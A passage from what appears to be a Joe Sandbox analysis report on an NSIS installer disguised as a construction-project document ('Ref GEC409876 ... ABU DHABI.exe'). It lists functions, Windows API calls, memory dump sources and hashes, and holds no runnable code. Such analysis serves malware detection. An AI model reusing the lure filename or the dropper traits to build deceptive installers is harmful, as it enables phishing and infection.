                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3808545654-0
                                                                                                                          • Opcode ID: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                                                                                          • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                                                                                          • Opcode Fuzzy Hash: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                                                                                          • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                                                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                          Function 00405E59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EA4
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EC7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: Call
                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                          • Instruction ID: 99b29286c29c4417609fc152e7ab7d49c37a34cf298751ff58d773eaaaf64e16
                                                                                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                          • Instruction Fuzzy Hash: 0501483215020AEADB218F16ED08E9B3BA8EF44351F00443AF944D2220E335DA60CBE5
                                                                                                                          Function 00405A82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405A90
                                                                                                                          • CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                          • CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsbA563.tmp, xrefs: 00405A83
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsbA563.tmp
                                                                                                                          • API String ID: 3213498283-17658044
                                                                                                                          • Opcode ID: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                                                                                          • Instruction ID: 5ad67665fffd931dad9daf24cd7e721830b1e1cd98268fde7792f953d01aa38a
                                                                                                                          • Opcode Fuzzy Hash: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                                                                                          • Instruction Fuzzy Hash: 60F09611B40A1196DF3176544CD5A7776B8EB54350F14823BE702B71C1D3F84C818FEA
                                                                                                                          Function 004059D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004059DD
                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004059E7
                                                                                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059F9
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3081826266
                                                                                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                          • Instruction ID: 7fac2ab44bb530718b2284b157b2a7f0092c6bde3eeb611d4a5a20073ea11bc0
                                                                                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                          • Instruction Fuzzy Hash: AAD05E61101921AAC21267458C00D9F629CEE86340340042AF101B30A1C77C1D428BFE
                                                                                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404258612-0
                                                                                                                          • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                                          • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                                                                                          • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                                          • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                                                                                          Function 00405ADF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405A90
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                                            • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 00405B38
                                                                                                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,C:\Users\user\AppData\Local\Temp\nsbA563.tmp,?,?,74DF2EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405B48
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsbA563.tmp
                                                                                                                          • API String ID: 3248276644-17658044
                                                                                                                          • Opcode ID: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                                                                                          • Instruction ID: befbdd5a087c2980586ea2edfffbf9f3f516deffcd0f82c81bc74a8a64b8095a
                                                                                                                          • Opcode Fuzzy Hash: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                                                                                          • Instruction Fuzzy Hash: 97F0D125208D5259D622323A1C49AAF3954CF82324B59063FB850B22D1DA3CA9439DBE
                                                                                                                          Function 004051A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 004051D7
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                                          • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                                                                                          • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                                          • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                                                                                          Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,00403861,74DF3420,0040366C,?), ref: 004038A4
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 1100898210-3081826266
                                                                                                                          • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                                          • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                                                                                          • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                                          • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                                                                                          Function 00405A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405A29
                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405A39
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-224404859
                                                                                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                          • Instruction ID: 70c70b289df7ad335b0e987d4c8d51b2e295f307612c2b5534f84bbf363d52d8
                                                                                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                          • Instruction Fuzzy Hash: EFD05EA25019209BD322A704DC40D9FA7ACEF513007454866F401A31A0D3785D818EA9
                                                                                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
